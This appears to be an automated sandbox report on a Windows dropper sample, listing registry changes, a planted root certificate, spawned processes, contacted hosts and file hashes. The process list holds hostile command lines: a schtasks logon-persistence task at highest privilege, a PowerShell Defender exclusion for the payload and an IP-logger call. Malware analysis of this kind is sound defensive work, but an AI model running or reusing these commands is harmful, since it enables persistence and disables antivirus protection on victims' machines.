Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2504 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2108 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe" -a

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487156 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 988

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
N/A 127.0.0.1:49262 tcp
N/A 127.0.0.1:49264 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 184.50.113.144:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 72.246.29.11:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
GB 142.250.178.3:80 c.pki.goog tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 sanctam.net udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 3394285ab7e1ef48bc775f71ed7b0a76
SHA1 646fadf1a0a0dafe07319c86de0587ed96a0fc2b
SHA256 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467
SHA512 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

memory/2704-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-59-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
